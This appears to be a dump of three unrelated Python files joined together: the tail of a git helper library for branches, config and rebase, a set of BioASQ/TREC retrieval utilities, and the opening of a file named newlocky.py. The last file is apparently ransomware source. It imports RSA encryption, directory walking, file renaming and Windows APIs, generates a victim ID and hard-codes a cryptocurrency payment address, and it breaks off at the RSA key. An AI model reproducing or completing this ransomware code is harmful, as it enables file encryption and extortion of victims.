pool.close()
except:
pool.terminate()
raise
finally:
pool.join()
class ProgressPrinter(object):
"""Threaded single-stat status message printer."""
def __init__(self, fmt, enabled=None, fout=sys.stderr, period=0.5):
"""Create a ProgressPrinter.
Use it as a context manager which produces a simple 'increment' method:
with ProgressPrinter('(%%(count)d/%d)' % 1000) as inc:
for i in xrange(1000):
# do stuff
if i % 10 == 0:
inc(10)
Args:
fmt - String format with a single '%(count)d' where the counter value
should go.
enabled (bool) - If this is None, will default to True if
logging.getLogger() is set to INFO or more verbose.
fout (file-like) - The stream to print status messages to.
period (float) - The time in seconds for the printer thread to wait
between printing.
"""
self.fmt = fmt
if enabled is None: # pragma: no cover
self.enabled = logging.getLogger().isEnabledFor(logging.INFO)
else:
self.enabled = enabled
self._count = 0
self._dead = False
self._dead_cond = threading.Condition()
self._stream = fout
self._thread = threading.Thread(target=self._run)
self._period = period
def _emit(self, s):
if self.enabled:
self._stream.write('\r' + s)
self._stream.flush()
def _run(self):
with self._dead_cond:
while not self._dead:
self._emit(self.fmt % {'count': self._count})
self._dead_cond.wait(self._period)
self._emit((self.fmt + '\n') % {'count': self._count})
def inc(self, amount=1):
self._count += amount
def __enter__(self):
self._thread.start()
return self.inc
def __exit__(self, _exc_type, _exc_value, _traceback):
self._dead = True
with self._dead_cond:
self._dead_cond.notifyAll()
self._thread.join()
del self._thread
def once(function):
"""@Decorates |function| so that it only performs its action once, no matter
how many times the decorated |function| is called."""
has_run = [False]
def _wrapper(*args, **kwargs):
if not has_run[0]:
has_run[0] = True
function(*args, **kwargs)
return _wrapper
def unicode_repr(s):
result = repr(s)
return result[1:] if result.startswith('u') else result
## Git functions
def die(message, *args):
print(textwrap.dedent(message % args), file=sys.stderr)
sys.exit(1)
def blame(filename, revision=None, porcelain=False, abbrev=None, *_args):
command = ['blame']
if porcelain:
command.append('-p')
if revision is not None:
command.append(revision)
if abbrev is not None:
command.append('--abbrev=%d' % abbrev)
command.extend(['--', filename])
return run(*command)
def branch_config(branch, option, default=None):
return get_config('branch.%s.%s' % (branch, option), default=default)
def branch_config_map(option):
"""Return {branch: <|option| value>} for all branches."""
try:
reg = re.compile(r'^branch\.(.*)\.%s$' % option)
lines = get_config_regexp(reg.pattern)
return {reg.match(k).group(1): v for k, v in (l.split() for l in lines)}
except subprocess2.CalledProcessError:
return {}
def branches(use_limit=True, *args):
NO_BRANCH = ('* (no branch', '* (detached', '* (HEAD detached')
key = 'depot-tools.branch-limit'
limit = get_config_int(key, 20)
raw_branches = run('branch', *args).splitlines()
num = len(raw_branches)
if use_limit and num > limit:
die("""\
Your git repo has too many branches (%d/%d) for this tool to work well.
You may adjust this limit by running:
git config %s <new_limit>
You may also try cleaning up your old branches by running:
git cl archive
""", num, limit, key)
for line in raw_branches:
if line.startswith(NO_BRANCH):
continue
yield line.split()[-1]
def get_config(option, default=None):
try:
return run('config', '--get', option) or default
except subprocess2.CalledProcessError:
return default
def get_config_int(option, default=0):
assert isinstance(default, int)
try:
return int(get_config(option, default))
except ValueError:
return default
def get_config_list(option):
try:
return run('config', '--get-all', option).split()
except subprocess2.CalledProcessError:
return []
def get_config_regexp(pattern):
if IS_WIN: # pragma: no cover
# this madness is because we call git.bat which calls git.exe which calls
# bash.exe (or something to that effect). Each layer divides the number of
# ^'s by 2.
pattern = pattern.replace('^', '^' * 8)
return run('config', '--get-regexp', pattern).splitlines()
def current_branch():
try:
return run('rev-parse', '--abbrev-ref', 'HEAD')
except subprocess2.CalledProcessError:
return None
def del_branch_config(branch, option, scope='local'):
del_config('branch.%s.%s' % (branch, option), scope=scope)
def del_config(option, scope='local'):
try:
run('config', '--' + scope, '--unset', option)
except subprocess2.CalledProcessError:
pass
def diff(oldrev, newrev, *args):
return run('diff', oldrev, newrev, *args)
def freeze():
took_action = False
key = 'depot-tools.freeze-size-limit'
MB = 2**20
limit_mb = get_config_int(key, 100)
untracked_bytes = 0
root_path = repo_root()
for f, s in status():
if is_unmerged(s):
die("Cannot freeze unmerged changes!")
if limit_mb > 0:
if s.lstat == '?':
untracked_bytes += os.lstat(os.path.join(root_path, f)).st_size
if limit_mb > 0 and untracked_bytes > limit_mb * MB:
die("""\
You appear to have too much untracked+unignored data in your git
checkout: %.1f / %d MB.
Run `git status` to see what it is.
In addition to making many git commands slower, this will prevent
depot_tools from freezing your in-progress changes.
You should add untracked data that you want to ignore to your repo's
.git/info/exclude
file. See `git help ignore` for the format of this file.
If this data is intended as part of your commit, you may adjust the
freeze limit by running:
git config %s <new_limit>
Where <new_limit> is an integer threshold in megabytes.""",
untracked_bytes / (MB * 1.0), limit_mb, key)
try:
run('commit', '--no-verify', '-m', FREEZE + '.indexed')
took_action = True
except subprocess2.CalledProcessError:
pass
add_errors = False
try:
run('add', '-A', '--ignore-errors')
except subprocess2.CalledProcessError:
add_errors = True
try:
run('commit', '--no-verify', '-m', FREEZE + '.unindexed')
took_action = True
except subprocess2.CalledProcessError:
pass
ret = []
if add_errors:
ret.append('Failed to index some unindexed files.')
if not took_action:
ret.append('Nothing to freeze.')
return ' '.join(ret) or None
def get_branch_tree():
"""Get the dictionary of {branch: parent}, compatible with topo_iter.
Returns a tuple of (skipped, <branch_tree dict>) where skipped is a set of
branches without upstream branches defined.
"""
skipped = set()
branch_tree = {}
for branch in branches():
parent = upstream(branch)
if not parent:
skipped.add(branch)
continue
branch_tree[branch] = parent
return skipped, branch_tree
def get_or_create_merge_base(branch, parent=None):
"""Finds the configured merge base for branch.
If parent is supplied, it's used instead of calling upstream(branch).
"""
base = branch_config(branch, 'base')
base_upstream = branch_config(branch, 'base-upstream')
parent = parent or upstream(branch)
if parent is None or branch is None:
return None
try:
actual_merge_base = run('merge-base', '--fork-point', parent, branch)
except subprocess2.CalledProcessError:
actual_merge_base = run('merge-base', parent, branch)
if base_upstream != parent:
base = None
base_upstream = None
def is_ancestor(a, b):
return run_with_retcode('merge-base', '--is-ancestor', a, b) == 0
if base and base != actual_merge_base:
if not is_ancestor(base, branch):
logging.debug('Found WRONG pre-set merge-base for %s: %s', branch, base)
base = None
elif is_ancestor(base, actual_merge_base):
logging.debug('Found OLD pre-set merge-base for %s: %s', branch, base)
base = None
else:
logging.debug('Found pre-set merge-base for %s: %s', branch, base)
if not base:
base = actual_merge_base
manual_merge_base(branch, base, parent)
return base
def hash_multi(*reflike):
return run('rev-parse', *reflike).splitlines()
def hash_one(reflike, short=False):
args = ['rev-parse', reflike]
if short:
args.insert(1, '--short')
return run(*args)
def in_rebase():
git_dir = run('rev-parse', '--git-dir')
return (
os.path.exists(os.path.join(git_dir, 'rebase-merge')) or
os.path.exists(os.path.join(git_dir, 'rebase-apply')))
def intern_f(f, kind='blob'):
"""Interns a file object into the git object store.
Args:
f (file-like object) - The file-like object to intern
kind (git object type) - One of 'blob', 'commit', 'tree', 'tag'.
Returns the git hash of the interned object (hex encoded).
"""
ret = run('hash-object', '-t', kind, '-w', '--stdin', stdin=f)
f.close()
return ret
def is_dormant(branch):
# TODO(iannucci): Do an oldness check?
return branch_config(branch, 'dormant', 'false') != 'false'
def is_unmerged(stat_value):
return (
'U' in (stat_value.lstat, stat_value.rstat) or
((stat_value.lstat == stat_value.rstat) and stat_value.lstat in 'AD')
)
def manual_merge_base(branch, base, parent):
set_branch_config(branch, 'base', base)
set_branch_config(branch, 'base-upstream', parent)
def mktree(treedict):
"""Makes a git tree object and returns its hash.
See |tree()| for the values of mode, type, and ref.
Args:
treedict - { name: (mode, type, ref) }
"""
with tempfile.TemporaryFile() as f:
for name, (mode, typ, ref) in treedict.items():
f.write(('%s %s %s\t%s\0' % (mode, typ, ref, name)).encode('utf-8'))
f.seek(0)
return run('mktree', '-z', stdin=f)
def parse_commitrefs(*commitrefs):
"""Returns binary encoded commit hashes for one or more commitrefs.
A commitref is anything which can resolve to a commit. Popular examples:
* 'HEAD'
* 'origin/master'
* 'cool_branch~2'
"""
try:
return [binascii.unhexlify(h) for h in hash_multi(*commitrefs)]
except subprocess2.CalledProcessError:
raise BadCommitRefException(commitrefs)
RebaseRet = collections.namedtuple('RebaseRet', 'success stdout stderr')
def rebase(parent, start, branch, abort=False):
"""Rebases |start|..|branch| onto the branch |parent|.
Args:
parent - The new parent ref for the rebased commits.
start - The commit to start from
branch - The branch to rebase
abort - If True, will call git-rebase --abort in the event that the rebase
doesn't complete successfully.
Returns a namedtuple with fields:
success - a boolean indicating that the rebase command completed
successfully.
message - if the rebase failed, this contains the stdout of the failed
rebase.
"""
try:
args = ['--onto', parent, start, branch]
if TEST_MODE:
args.insert(0, '--committer-date-is-author-date')
run('rebase', *args)
return RebaseRet(True, '', '')
except subprocess2.CalledProcessError as cpe:
if abort:
run_with_retcode('rebase', '--abort') # ignore failure
return RebaseRet(False, cpe.stdout.decode('utf-8', 'replace'),
cpe.stderr.decode('utf-8', 'replace'))
def remove_merge_base(branch):
del_branch_config(branch, 'base')
del_branch_config(branch, 'base-upstream')
def repo_root():
"""Returns the absolute path to the repository root."""
return run('rev-parse', '--show-toplevel')
def upstream_default():
"""Returns the default branch name of the origin repository."""
try:
return run('rev-parse', '--abbrev-ref', 'origin/HEAD')
except subprocess2.CalledProcessError:
return 'origin/master'
def root():
return get_config('depot-tools.upstream', upstream_default())
@contextlib.contextmanager
def less(): # pragma: no cover
"""Runs 'less' as context manager yielding its stdin as a PIPE.
Automatically checks if sys.stdout is a non-TTY stream. If so, it avoids
running less and just yields sys.stdout.
The returned PIPE is opened on binary mode.
"""
if not setup_color.IS_TTY:
# On Python 3, sys.stdout doesn't accept bytes, and sys.stdout.buffer must
# be used.
yield getattr(sys.stdout, 'buffer', sys.stdout)
return
# Run with the same options that git uses (see setup_pager in git repo).
# -F: Automatically quit if the output is less than one screen.
# -R: Don't escape ANSI color codes.
# -X: Don't clear the screen before starting.
cmd = ('less', '-FRX')
try:
proc = subprocess2.Popen(cmd, stdin=subprocess2.PIPE)
yield proc.stdin
finally:
try:
proc.stdin.close()
except BrokenPipeError:
# BrokenPipeError is raised if proc has already completed,
pass
proc.wait()
def run(*cmd, **kwargs):
"""The same as run_with_stderr, except it only returns stdout."""
return run_with_stderr(*cmd, **kwargs)[0]
def run_with_retcode(*cmd, **kwargs):
"""Run a command but only return the status code."""
try:
run(*cmd, **kwargs)
return 0
except subprocess2.CalledProcessError as cpe:
return cpe.returncode
def run_stream(*cmd, **kwargs):
"""Runs a git command. Returns stdout as a PIPE (file-like object).
stderr is dropped to avoid races if the process outputs to both stdout and
stderr.
"""
kwargs.setdefault('stderr', subprocess2.VOID)
kwargs.setdefault('stdout', subprocess2.PIPE)
kwargs.setdefault('shell', False)
cmd = (GIT_EXE, '-c', 'color.ui=never') + cmd
proc = subprocess2.Popen(cmd, **kwargs)
return proc.stdout
@contextlib.contextmanager
def run_stream_with_retcode(*cmd, **kwargs):
"""Runs a git command as context manager yielding stdout as a PIPE.
stderr is dropped to avoid races if the process outputs to both stdout and
stderr.
Raises subprocess2.CalledProcessError on nonzero return code.
"""
kwargs.setdefault('stderr', subprocess2.VOID)
kwargs.setdefault('stdout', subprocess2.PIPE)
kwargs.setdefault('shell', False)
cmd = (GIT_EXE, '-c', 'color.ui=never') + cmd
try:
proc = subprocess2.Popen(cmd, **kwargs)
yield proc.stdout
finally:
retcode = proc.wait()
if retcode != 0:
raise subprocess2.CalledProcessError(retcode, cmd, os.getcwd(),
b'', b'')
def run_with_stderr(*cmd, **kwargs):
"""Runs a git command.
Returns (stdout, stderr) as a pair of strings.
kwargs
autostrip (bool) - Strip the output. Defaults to True.
indata (str) - Specifies stdin data for the process.
"""
kwargs.setdefault('stdin', subprocess2.PIPE)
kwargs.setdefault('stdout', subprocess2.PIPE)
kwargs.setdefault('stderr', subprocess2.PIPE)
kwargs.setdefault('shell', False)
autostrip = kwargs.pop('autostrip', True)
indata = kwargs.pop('indata', None)
decode = kwargs.pop('decode', True)
cmd = (GIT_EXE, '-c', 'color.ui=never') + cmd
proc = subprocess2.Popen(cmd, **kwargs)
ret, err = proc.communicate(indata)
retcode = proc.wait()
if retcode != 0:
raise subprocess2.CalledProcessError(retcode, cmd, os.getcwd(), ret, err)
if autostrip:
ret = (ret or b'').strip()
err = (err or b'').strip()
if decode:
ret = ret.decode('utf-8', 'replace')
err = err.decode('utf-8', 'replace')
return ret, err
def set_branch_config(branch, option, value, scope='local'):
set_config('branch.%s.%s' % (branch, option), value, scope=scope)
def set_config(option, value, scope='local'):
run('config', '--' + scope, option, value)
def get_dirty_files():
# Make sure index is up-to-date before running diff-index.
run_with_retcode('update-index', '--refresh', '-q')
return run('diff-index', '--ignore-submodules', '--name-status', 'HEAD')
def is_dirty_git_tree(cmd):
w = lambda s: sys.stderr.write(s+"\n")
dirty = get_dirty_files()
if dirty:
w('Cannot %s with a dirty tree. Commit, freeze or stash your changes first.'
% cmd)
w('Uncommitted files: (git diff-index --name-status HEAD)')
w(dirty[:4096])
if len(dirty) > 4096: # pragma: no cover
w('... (run "git diff-index --name-status HEAD" to see full output).')
return True
return False
def status():
"""Returns a parsed version of git-status.
Returns a generator of (current_name, (lstat, rstat, src)) pairs where:
* current_name is the name of the file
* lstat is the left status code letter from git-status
* rstat is the left status code letter from git-status
* src is the current name of the file, or the original name of the file
if lstat == 'R'
"""
stat_entry = collections.namedtuple('stat_entry', 'lstat rstat src')
def tokenizer(stream):
acc = BytesIO()
c = None
while c != b'':
c = stream.read(1)
if c in (None, b'', b'\0'):
if len(acc.getvalue()):
yield acc.getvalue()
acc = BytesIO()
else:
acc.write(c)
def parser(tokens):
while True:
try:
status_dest = next(tokens).decode('utf-8')
except StopIteration:
return
stat, dest = status_dest[:2], status_dest[3:]
lstat, rstat = stat
if lstat == 'R':
src = next(tokens).decode('utf-8')
else:
src = dest
yield (dest, stat_entry(lstat, rstat, src))
return parser(tokenizer(run_stream('status', '-z', bufsize=-1)))
def squash_current_branch(header=None, merge_base=None):
header = header or 'git squash commit for %s.' % current_branch()
merge_base = merge_base or get_or_create_merge_base(current_branch())
log_msg = header + '\n'
if log_msg:
log_msg += '\n'
log_msg += run('log', '--reverse', '--format=%H%n%B', '%s..HEAD' % merge_base)
run('reset', '--soft', merge_base)
if not get_dirty_files():
# Sometimes the squash can result in the same tree, meaning that there is
# nothing to commit at this point.
print('Nothing to commit; squashed branch is empty')
return False
run('commit', '--no-verify', '-a', '-F', '-', indata=log_msg.encode('utf-8'))
return True
def tags(*args):
return run('tag', *args).splitlines()
def thaw():
took_action = False
for sha in run_stream('rev-list', 'HEAD').readlines():
sha = sha.strip().decode('utf-8')
msg = run('show', '--format=%f%b', '-s', 'HEAD')
match = FREEZE_MATCHER.match(msg)
if not match:
if not took_action:
return 'Nothing to thaw.'
break
run('reset', '--' + FREEZE_SECTIONS[match.group(1)], sha)
took_action = True
def topo_iter(branch_tree, top_down=True):
"""Generates (branch, parent) in topographical order for a branch tree.
Given a tree:
A1
B1 B2
C1 C2 C3
D1
branch_tree would look like: {
'D1': 'C3',
'C3': 'B2',
'B2': 'A1',
'C1': 'B1',
'C2': 'B1',
'B1': 'A1',
}
It is OK to have multiple 'root' nodes in your graph.
if top_down is True, items are yielded from A->D. Otherwise they're yielded
from D->A. Within a layer the branches will be yielded in sorted order.
"""
branch_tree = branch_tree.copy()
# TODO(iannucci): There is probably a more efficient way to do these.
if top_down:
while branch_tree:
this_pass = [(b, p) for b, p in branch_tree.items()
if p not in branch_tree]
assert this_pass, "Branch tree has cycles: %r" % branch_tree
for branch, parent in sorted(this_pass):
yield branch, parent
del branch_tree[branch]
else:
parent_to_branches = collections.defaultdict(set)
for branch, parent in branch_tree.items():
parent_to_branches[parent].add(branch)
while branch_tree:
this_pass = [(b, p) for b, p in branch_tree.items()
if not parent_to_branches[b]]
assert this_pass, "Branch tree has cycles: %r" % branch_tree
for branch, parent in sorted(this_pass):
yield branch, parent
parent_to_branches[parent].discard(branch)
del branch_tree[branch]
def tree(treeref, recurse=False):
"""Returns a dict representation of a git tree object.
Args:
treeref (str) - a git ref which resolves to a tree (commits count as trees).
recurse (bool) - include all of the tree's descendants too. File names will
take the form of 'some/path/to/file'.
Return format:
{ 'file_name': (mode, type, ref) }
mode is an integer where:
* 0040000 - Directory
* 0100644 - Regular non-executable file
* 0100664 - Regular non-executable group-writeable file
* 0100755 - Regular executable file
* 0120000 - Symbolic link
* 0160000 - Gitlink
type is a string where it's one of 'blob', 'commit', 'tree', 'tag'.
ref is the hex encoded hash of the entry.
"""
ret = {}
opts = ['ls-tree', '--full-tree']
if recurse:
opts.append('-r')
opts.append(treeref)
try:
for line in run(*opts).splitlines():
mode, typ, ref, name = line.split(None, 3)
ret[name] = (mode, typ, ref)
except subprocess2.CalledProcessError:
return None
return ret
def get_remote_url(remote='origin'):
try:
return run('config', 'remote.%s.url' % remote)
except subprocess2.CalledProcessError:
return None
def upstream(branch):
try:
return run('rev-parse', '--abbrev-ref', '--symbolic-full-name',
branch+'@{upstream}')
except subprocess2.CalledProcessError:
return None
def get_git_version():
"""Returns a tuple that contains the numeric components of the current git
version."""
version_string = run('--version')
version_match = re.search(r'(\d+.)+(\d+)', version_string)
version = version_match.group() if version_match else ''
return tuple(int(x) for x in version.split('.'))
def get_branches_info(include_tracking_status):
format_string = (
'--format=%(refname:short):%(objectname:short):%(upstream:short):')
# This is not covered by the depot_tools CQ which only has git version 1.8.
if (include_tracking_status and
get_git_version() >= MIN_UPSTREAM_TRACK_GIT_VERSION): # pragma: no cover
format_string += '%(upstream:track)'
info_map = {}
data = run('for-each-ref', format_string, 'refs/heads')
BranchesInfo = collections.namedtuple(
'BranchesInfo', 'hash upstream commits behind')
for line in data.splitlines():
(branch, branch_hash, upstream_branch, tracking_status) = line.split(':')
commits = None
base = get_or_create_merge_base(branch)
if base:
commits_list = run('rev-list', '--count', branch, '^%s' % base, '--')
commits = int(commits_list) or None
behind_match = re.search(r'behind (\d+)', tracking_status)
behind = int(behind_match.group(1)) if behind_match else None
info_map[branch] = BranchesInfo(
hash=branch_hash, upstream=upstream_branch, commits=commits,
behind=behind)
# Set None for upstreams which are not branches (e.g empty upstream, remotes
# and deleted upstream branches).
missing_upstreams = {}
for info in info_map.values():
if info.upstream not in info_map and info.upstream not in missing_upstreams:
missing_upstreams[info.upstream] = None
result = info_map.copy()
result.update(missing_upstreams)
return result
def make_workdir_common(repository, new_workdir, files_to_symlink,
files_to_copy, symlink=None):
if not symlink:
symlink = os.symlink
os.makedirs(new_workdir)
for entry in files_to_symlink:
clone_file(repository, new_workdir, entry, symlink)
for entry in files_to_copy:
clone_file(repository, new_workdir, entry, shutil.copy)
def make_workdir(repository, new_workdir):
GIT_DIRECTORY_WHITELIST = [
'config',
'info',
'hooks',
'logs/refs',
'objects',
'packed-refs',
'refs',
'remotes',
'rr-cache',
'shallow',
]
make_workdir_common(repository, new_workdir, GIT_DIRECTORY_WHITELIST,
['HEAD'])
def clone_file(repository, new_workdir, link, operation):
if not os.path.exists(os.path.join(repository, link)):
return
link_dir = os.path.dirname(os.path.join(new_workdir, link))
if not os.path.exists(link_dir):
os.makedirs(link_dir)
src = os.path.join(repository, link)
if os.path.islink(src):
src = os.path.realpath(src)
operation(src, os.path.join(new_workdir, link))
|
bioasq_utils.py
|
import os
from os.path import join
import tempfile
import shutil
import pickle
import gc
import json
import tarfile
import codecs
import sys
from mmnrm.evaluation import f_map, f_recall
from datetime import datetime as dt
from nir.utils import change_bm25_parameters
import copy
from trectools import fusion, TrecRun
from collections import defaultdict
def fusion_rrf(run_paths, output_path):
runs = [ TrecRun(path) for path in run_paths]
fused_run = fusion.reciprocal_rank_fusion(runs)
fused_run.print_subset(output_path, topics=fused_run.topics())
def load_trec_run(file, queries):
final_run = copy.deepcopy(queries)
run = defaultdict(list)
with open(file, "r") as f:
for line in f:
line = line.split(" ")
run[line[0]].append({
"id":line[2],
"score":line[4],
})
for q in final_run:
q["documents"] = run[q["id"]]
return final_run
def load_trec_run_snippets(file, queries):
final_run = copy.deepcopy(queries)
run = defaultdict(list)
with open(file, "r") as f:
for line in f:
line = line.split(" ")
run[line[0]].append({
"id":line[2],
"score":line[4],
})
for q in final_run:
q["snippets"] = run[q["id"]]
return final_run
def convert_trec_run_to_bioasq(trec_path, queries, bioasq_path):
run = load_trec_run(trec_path, queries)
write_as_bioasq(run, bioasq_path)
def convert_trec_run_to_bioasq_wSnippets(trec_path, trec_path_snippets, cached_snipepts, queries, bioasq_path):
doc_run = load_trec_run(trec_path, queries)
snippet_run = load_trec_run_snippets(trec_path_snippets, queries)
snippet_run = {q["id"]:q for q in snippet_run}
for q in doc_run:
q["snippets"] = [ cached_snipepts[s["id"]] for s in snippet_run[q["id"]]["snippets"] ]
write_as_bioasq(doc_run, bioasq_path)
def write_as_bioasq(run, file, max_docs=10, max_snippets=10):
final_run = copy.deepcopy(run)
for query in final_run:
if "query" in query:
query["body"] = query.pop("query")
if "documents" in query:
query["documents"] = list(map(lambda x:"http://www.ncbi.nlm.nih.gov/pubmed/"+x["id"], query["documents"]))[:max_docs]
else:
query["documents"] = []
if "snippets" not in query:
query["snippets"] = []
else:
snippets = []
for snippet in query["snippets"][:max_snippets]:
section = "title" if snippet["is_title"] else "abstract"
snippets.append({
"beginSection": section,
"endSection": section,
"text": snippet["text"],
"document": "http://www.ncbi.nlm.nih.gov/pubmed/"+snippet["doc_id"],
"offsetInBeginSection": snippet["start"],
"offsetInEndSection": snippet["end"]
})
query["snippets"] = snippets
with open(file, "w", encoding="utf-8") as f:
json.dump({"questions":final_run}, f)
def evaluation(run, gs, top_n):
predictions = []
expectations = []
for query in run:
if query["id"] in gs:
predictions.append(list(map(lambda x:x["id"], query["documents"])))
expectations.append(gs[query["id"]]) #gs
return f_map(predictions, expectations, bioASQ_version=8, at=top_n),f_recall(predictions, expectations, at=top_n)
def separate_queries_goldstandard(queires, additional_keys=[]):
clean_queires = []
gs = {}
additional_keys = ["id", "query"] + additional_keys
for x in queires:
clean_queires.append({k:x[k] for k in additional_keys})
gs[x["id"]] = list(map(lambda y : y.split("/")[-1], x["documents"]))
return clean_queires, gs
def create_document_run(queries, run, snippets = None):
final_run = copy.deepcopy(queries)
for query in final_run:
query["documents"] = run[query["id"]]
if snippets is not None:
query["snippets"] = snippets[query["id"]]
return final_run
def save_document_run(run, file):
with open(file, "w") as f:
json.dump(run,f)
def load_document_run(file, dict_format=False):
with open(file, "r") as f:
run = json.load(f)
if isinstance(run,list) and dict_format:
_temp = {}
for q in run:
_temp[q["id"]] = q["documents"]
run = _temp
return run
def write_as_trec_snippets(run, file):
with open(file, "w") as f:
for query in run:
for rank,s in enumerate(query["snippets"]):
f.write("{} Q0 {} {} {} {}\n".format(query["id"],
s["snippet_id"],
rank,
s["score"],
"bioasq_as_trec"))
def write_as_trec(run, file):
with open(file, "w") as f:
for query in run:
for rank,doc in enumerate(query["documents"]):
f.write("{} Q0 {} {} {} {}\n".format(query["id"],
doc["id"],
rank,
doc["score"],
"bioasq_as_trec"))
def load_document_trec_run(file, *runs):
full_run = {}
runs = runs[0]
for q in load_document_run(runs[0]):
_temp = {}
for doc in q["documents"]:
_temp[doc["id"]] = doc
full_run[q["id"]] = _temp
for r in runs[1:]:
for q in load_document_run(r):
for doc in q["documents"]:
if doc["id"] not in full_run[q["id"]]:
full_run[q["id"]][doc["id"]] = doc
run = defaultdict(list)
with open(file, "r") as f:
for line in f:
line = line.split(" ")
run[line[0]].append({
"id":line[2],
"score":line[4],
"text":full_run[line[0]][line[2]]["text"],
"title":full_run[line[0]][line[2]]["title"]
})
return run
def load_bioasq_format(file, maps=None):
"""
Load the BioASQ format file and apply any a mapping list if needed
"""
with open(file, "r", encoding="utf-8") as f:
data = json.load(f)["questions"]
if maps:
for query in data:
for old_key,new_key in maps:
query[new_key] = query.pop(old_key)
return data
"""
Load the BioASQ query and apply any a mapping list if needed
For backward compatibility
"""
load_queries = load_bioasq_format
def subset_byId(data, set_ids):
return [ x for x in data if x["id"] in set_ids]
def dir_tree_run(action, base_dir):
"""
Apply funcition "action" to the individual files from tree directory
"""
_temp_f_name = ""
for f_name in os.listdir(base_dir):
_temp_f_name = os.path.join(base_dir,f_name)
if os.path.isdir(_temp_f_name):
dir_tree_run(action,_temp_f_name)
else:
action(_temp_f_name)
def process_open_xml(proc_id, xml_files, output_dir):
import pubmed_parser as pp
def filter_mesh(string):
return " ".join(map(lambda y:y[0], map(lambda x: x.split(";"), string.split(":")[1:])))
print("[Process-{}] Started".format(proc_id))
articles = []
for file_name in xml_files:
print(proc_id, file_name)
try:
articles.extend(pp.parse_medline_xml(file_name, year_info_only=False, nlm_category=False))
except etree.XMLSyntaxError:
print("Error on File " + file_name)
gc.collect()
articles_filter = filter(lambda x: (x["abstract"] is not None and len(x["abstract"])>0 and x["pubdate"] != ""), articles)
articles_mapped = list(map(lambda x:{"id":x["pmid"],
"title":x["title"],
"abstract":x["abstract"],
"keywords":x["keywords"],
"pubdate":x["pubdate"],
"mesh_terms":filter_mesh(x["mesh_terms"]),
"delete":x["delete"]}
,articles_filter))
file_name = output_dir+"/pubmed_2019_{0:03}.p".format(proc_id)
print("[Process-{}]: Store {}".format(proc_id, file_name))
with open(file_name, "wb") as f:
pickle.dump(articles_mapped, f)
del articles
print("[Process-{}] Ended".format(proc_id))
def multiprocess_xml_to_json(xml_files, n_process, max_store_size=int(3e6), store_path="/backup/pubmed_archive_json/"):
from multiprocessing import Process
total_files = len(xml_files)
itter = total_files//n_process
tmp_path = tempfile.mkdtemp()
process = []
try:
for _i,i in enumerate(range(0, total_files, itter)):
process.append(Process(target=process_open_xml, args=(_i, xml_files[i:i+itter], tmp_path)))
print("[MULTIPROCESS LOOP] Starting", n_process, "process")
for p in process:
p.start()
print("[MULTIPROCESS LOOP] Wait", n_process, "process")
for p in process:
p.join()
del process
gc.collect()
## merge
resulting_files = sorted(os.listdir(tmp_path))
articles = []
for file in resulting_files:
with open(os.path.join(tmp_path, file), "rb") as f:
articles.extend(pickle.load(f))
# batch save
size = len(articles)
print(size)
itter = max_store_size
for i in range(0, size, itter):
file_name = store_path+"/pubmedMedline_2019_{0:08}_to_{1:08}".format(i, min(size, i+itter))
print("Save file",file_name,":",end="")
json.dump(articles[i:i+itter], open(file_name,"w"))
print("Done")
except Exception as e:
raise e
finally:
shutil.rmtree(tmp_path)
def multiprocess_xml_read(xml_files, n_process, max_store_size=int(3e6), store_path="/backup/pubmed_archive_json/", open_fn=process_open_xml):
from multiprocessing import Process
total_files = len(xml_files)
itter = total_files//n_process
tmp_path = tempfile.mkdtemp()
process = []
try:
for _i,i in enumerate(range(0, total_files, itter)):
process.append(Process(target=open_fn, args=(_i, xml_files[i:i+itter], tmp_path)))
print("[MULTIPROCESS LOOP] Starting", n_process, "process")
for p in process:
p.start()
print("[MULTIPROCESS LOOP] Wait", n_process, "process")
for p in process:
p.join()
del process
gc.collect()
## merge
resulting_files = sorted(os.listdir(tmp_path))
articles = []
for file in resulting_files:
with open(os.path.join(tmp_path, file), "rb") as f:
articles.extend(pickle.load(f))
except Exception as e:
raise e
finally:
shutil.rmtree(tmp_path)
return articles
def collection_iterator(file_name, f_map=None):
return collection_iterator_fn(file_name=file_name, f_map=f_map)()
def collection_iterator_fn(file_name, f_map=None):
reader = codecs.getreader("ascii")
tar = tarfile.open(file_name)
print("[CORPORA] Openning tar file", file_name)
members = tar.getmembers()
def generator():
for m in members:
print("[CORPORA] Openning tar file {}".format(m.name))
f = tar.extractfile(m)
articles = json.load(reader(f))
if f_map is not None:
articles = list(map(f_map, articles))
yield articles
f.close()
del f
gc.collect()
return generator
def create_filter_query_function():
if sys.version_info < (3,):
maketrans = string.maketrans
else:
maketrans = str.maketrans
filters = '+-=&|><!(){}[]^"~*?:\/'
tab = maketrans(filters, " "*(len(filters)))
def f(query_string):
return query_string.translate(tab)
return f
def to_date(_str):
for fmt in ("%Y-%m", "%Y-%m-%d", "%Y"):
try:
return dt.strptime(_str, fmt)
except ValueError:
pass
raise ValueError("No format found")
def execute_search(es, queries, top_n, index_name, k1=0.4, b=0.4, limit_date = None):
print("Setting the k1 and b for BM25")
change_bm25_parameters(k1, b, index_name, es)
query_filter = create_filter_query_function()
predictions = []
if limit_date is None:
print("The inquery limit_date will be used")
for i, query_data in enumerate(queries):
#query = query_data["query"]
#query = query_filter(query_data["body"])
query = query_data["query"]
if "limit_date" in query_data:
limit_date = query_data["limit_date"]
elif limit_date is None:
raise ValueError("Need to set or provide a limit_date")
query_es = {
"query": {
"bool": {
"must": [
{
"query_string": {
"query": query_filter(query),
"analyzer": "english",
"fields": [ "text" ]
}
},
{
"range": {
"pubdate": {
"lte": limit_date
}
}
}
],
"filter": [],
"should": [],
"must_not": []
}
}
}
retrieved = es.search(index=index_name, body=query_es, size=top_n, request_timeout=200)
clean_results = list(map(lambda x: {"id":x['_source']["id"], "text":x['_source']["text"],"title":x['_source']["title"], "score":x["_score"]}, retrieved['hits']['hits']))
predictions.append((query_data["id"], clean_results))
if not i%20:
print("Running query:", i, end="\r")
return dict(predictions)
|
newlocky.py
|
from base64 import b64encode
from base64 import b64decode
from threading import Thread
from Crypto.Cipher import PKCS1_v1_5 as Cipher_pkcs1_v1_5
from Crypto.PublicKey import RSA
from ctypes import windll
from os import walk
from os import rename
from os import path
from os import urandom
def npass(length):
if not isinstance(length, int) or length < 8:
raise ValueError("temp password must have positive length")
chars = "abcdefghijklmnopqrstvwxyzABCDEFGHJKLMNPQRSTUVWXYZ23456789"
x = urandom(length)
x = x.decode('latin1')
return "".join(chars[ord(c) % len(chars)] for c in x)
uid = npass(16) + "a3"
address = '31k66UgDfv6DVdi4HubFpbwXkh6vN44CEF'
rsa_public_key = '''-----BEGIN PUBLIC KEY-----
